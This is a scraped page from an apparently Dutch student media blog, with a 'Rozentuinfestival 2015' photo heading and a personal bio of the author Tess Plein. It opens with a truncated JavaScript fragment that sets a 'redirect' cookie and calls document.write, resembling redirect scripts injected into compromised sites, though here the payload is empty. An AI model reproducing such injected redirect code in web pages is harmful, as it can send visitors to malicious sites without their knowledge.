=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}">
Close

Foto's

Rozentuinfestival 2015

Reacties

Nog geen reacties

Laat een bericht achter

Gepost op 3 juli door:

Tess Plein

Ik ben Tess met dubbel S en ik film bij de PIT. Groot muziekliefhebber, harde werker en toekomstig wereldreiziger. Ik zou wensen dat ik nooit gestopt was met gitaar spelen want dat ís me toch een geweldig instrument. Ik zit in mijn eindexamenjaar op het Gerrit van der Veen en daarna wil ik International Business Innovation gaan doen. Ik kan intens genieten van een goed concert van Wakey!Wakey!, fietsen op een warme zomeravond en tripjes naar het buitenland. Ik heb een pittig slechte doorbloeding waardoor mijn handen er zo nu en dan afvriezen, heb stiekem nog een knuffel en slobbertruien zijn de beste uitvinding ooit. Ciao!

Posts
Tess
Plein